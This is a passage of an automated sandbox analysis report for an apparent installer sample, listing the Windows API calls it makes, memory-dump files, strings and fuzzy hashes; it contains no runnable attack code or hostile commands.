                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 589700163-201144300
                                                                          • Opcode ID: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
                                                                          • Instruction ID: 98207d01bde9e00a0eed0430611c531f9d380fb7e7b936b50ef7ef360768d6c7
                                                                          • Opcode Fuzzy Hash: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
                                                                          • Instruction Fuzzy Hash: A6110871804B9429F73217248C40B777F98CB56760F18047BE5D5722C2C67C5E828EED
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00403EEC
                                                                          • GetSysColor.USER32(00000000), ref: 00403F08
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403F14
                                                                          • SetBkMode.GDI32(?,?), ref: 00403F20
                                                                          • GetSysColor.USER32(?), ref: 00403F33
                                                                          • SetBkColor.GDI32(?,?), ref: 00403F43
                                                                          • DeleteObject.GDI32(?), ref: 00403F5D
                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403F67
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                          • Instruction ID: bef5c4da8a9fddcda3e14ba796976a45e550bdb17cacbe877f2265ea57743fc9
                                                                          • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                          • Instruction Fuzzy Hash: 47218471904745ABCB219F68DD48F4BBFF8AF01715B048529F896E22E1D738EA04CB55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,0002FC00,00000000,40000000,00000002,00000000,00000000), ref: 004026D9
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004026F5
                                                                          • GlobalFree.KERNEL32(?), ref: 0040272E
                                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402740
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402747
                                                                          • CloseHandle.KERNEL32(?), ref: 0040275F
                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402773
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                          • String ID:
                                                                          • API String ID: 3294113728-0
                                                                          • Opcode ID: 5f35d965983ca7f2dda12368233f325fc0b332720f8fd806657e168f369d51d1
                                                                          • Instruction ID: d2462f277a9bbeab74e05a3ba9edc35ed5f42c1e2e96cac32811c1f7214cd279
                                                                          • Opcode Fuzzy Hash: 5f35d965983ca7f2dda12368233f325fc0b332720f8fd806657e168f369d51d1
                                                                          • Instruction Fuzzy Hash: 47319C71C00128BBDF216FA9DD89DAE7A79EF08364F10422AF520772E0C7795C419FA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040474B
                                                                          • GetMessagePos.USER32 ref: 00404753
                                                                          • ScreenToClient.USER32(?,?), ref: 0040476D
                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040477F
                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047A5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                          • Instruction ID: ad1af3c478a57eda8923b13f4794356c9ed70ebf35a35ad09a5ca660a75b0f14
                                                                          • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                          • Instruction Fuzzy Hash: 16015275D40218BADB01DBA4DC45FFEBBBCAF55711F10412BBA10B72C0C7B465018BA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5F
                                                                          • MulDiv.KERNEL32(000844F0,00000064,000844F4), ref: 00402B8A
                                                                          • wsprintfA.USER32 ref: 00402B9A
                                                                          • SetWindowTextA.USER32(?,?), ref: 00402BAA
                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBC
                                                                          Strings
                                                                          • verifying installer: %d%%, xrefs: 00402B94
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                          • String ID: verifying installer: %d%%
                                                                          • API String ID: 1451636040-82062127
                                                                          • Opcode ID: 504712adeadd9352c4a14490f0cd0c9c0cfaa5826e6c2da3921648d7ab385779
                                                                          • Instruction ID: 93a9953827b1cdb6b1926f3dfe8af3c360bd0244c58553ac49039ba424eb549a
                                                                          • Opcode Fuzzy Hash: 504712adeadd9352c4a14490f0cd0c9c0cfaa5826e6c2da3921648d7ab385779
                                                                          • Instruction Fuzzy Hash: A8016770940208BBDF209F60DD09FAE3B79BB00304F008039FA06B92D1D7B9A951CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00401D29
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                          • CreateFontIndirectA.GDI32(0040A7A0), ref: 00401DA1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                          • String ID: Times New Roman
                                                                          • API String ID: 3808545654-927190056
                                                                          • Opcode ID: 35d53cb6737e2db00cfcc0afea18a5e523b9ea7051ff07917f3b96452516af9d
                                                                          • Instruction ID: 685ed0ca33fa1d5999e3341403fc008963373260a57280c7a8a131362965c6fe
                                                                          • Opcode Fuzzy Hash: 35d53cb6737e2db00cfcc0afea18a5e523b9ea7051ff07917f3b96452516af9d
                                                                          • Instruction Fuzzy Hash: DD0162B1958340AFE7015BB09E1AB9B3F74E765305F108479F541B72E2C67854158B2B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,0000001F,?,100010FF), ref: 100010A5
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 100010AC
                                                                          • GetCurrentProcess.KERNEL32(?,?,0000001F,?,100010FF), ref: 100010BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1660349596.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.1660317252.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660367794.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660387960.0000000010003000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660407195.0000000010004000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                          • String ID: IsWow64Process$kernel32
                                                                          • API String ID: 4190356694-3789238822
                                                                          • Opcode ID: a69420274d1fcaf7f73670a70dd50bd4e7ba031045505111d8b2d2074fed8b9d
                                                                          • Instruction ID: 3378e50aa8632b37a7392fd531010f74dfbca9613fe3ca790b78382dea599c52
                                                                          • Opcode Fuzzy Hash: a69420274d1fcaf7f73670a70dd50bd4e7ba031045505111d8b2d2074fed8b9d
                                                                          • Instruction Fuzzy Hash: 3FE04672902224EBFA10E7E18C48A8B3FACDB002C1B004612FA01D310DEAA4DA008AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,74E02D70,00000000,?,?,?,?,100016CD,?,?), ref: 1000179F
                                                                          • OemToCharBuffA.USER32(?,?,00000000), ref: 100017A8
                                                                          • SendMessageA.USER32(00001004,00000000,00000000,00000000), ref: 100017C2
                                                                          • SendMessageA.USER32(00001007,00000000,?), ref: 100017E4
                                                                          • SendMessageA.USER32(00001013,?,00000000), ref: 100017F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1660349596.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.1660317252.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660367794.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660387960.0000000010003000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1660407195.0000000010004000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BuffCharlstrlen
                                                                          • String ID:
                                                                          • API String ID: 2682914888-0
                                                                          • Opcode ID: f740b4085d80ef29015cc9a1331dff64072d625cbcc2c1286d08e3d57b8dbe1a
                                                                          • Instruction ID: 90dde77562e541da37abdf46a141ede9779f145cd2dde5f2d943d3f32080e889
                                                                          • Opcode Fuzzy Hash: f740b4085d80ef29015cc9a1331dff64072d625cbcc2c1286d08e3d57b8dbe1a
                                                                          • Instruction Fuzzy Hash: 7E010C72910218BFEB129F94CCC49EF7BBDFB48799F10402AF600B6154D6B16D54DB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetDlgItem.USER32(?), ref: 00401CD0
                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                          • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          • Opcode ID: 070b3579fd3ce9466ee50df54838f458f8c81f4b11fdd9c12f5c579012b0b7c6
                                                                          • Instruction ID: 854dc7b36677132a153458acbc54d2aec341d78ddb5050a54aa2f8e30eae251c
                                                                          • Opcode Fuzzy Hash: 070b3579fd3ce9466ee50df54838f458f8c81f4b11fdd9c12f5c579012b0b7c6
                                                                          • Instruction Fuzzy Hash: 57F062B2D04114AFE701EBA4DD88CAF77BCEB44301B004576F501F2091C7389D018B79
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0079E4F8,0079E4F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040456E,000000DF,0000040F,00000400,00000000), ref: 004046DC
                                                                          • wsprintfA.USER32 ref: 004046E4
                                                                          • SetDlgItemTextA.USER32(?,0079E4F8), ref: 004046F7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s
                                                                          • API String ID: 3540041739-3551169577
                                                                          • Opcode ID: 719c455404f5c3923e5dd32184b215a0a50f5ab94fe34a31874286de9948b614
                                                                          • Instruction ID: cb72ff88f5f2b4ba7204730e7c77314340c58308aab751b64ccb2cc1a1ae2234
                                                                          • Opcode Fuzzy Hash: 719c455404f5c3923e5dd32184b215a0a50f5ab94fe34a31874286de9948b614
                                                                          • Instruction Fuzzy Hash: 6D11087360013437DB0061699C46EAF376DDBC6374F14463BFA29F61D2E979AC1182E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetWindowTextA.USER32(00000000,Profiling Setup), ref: 00403960
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
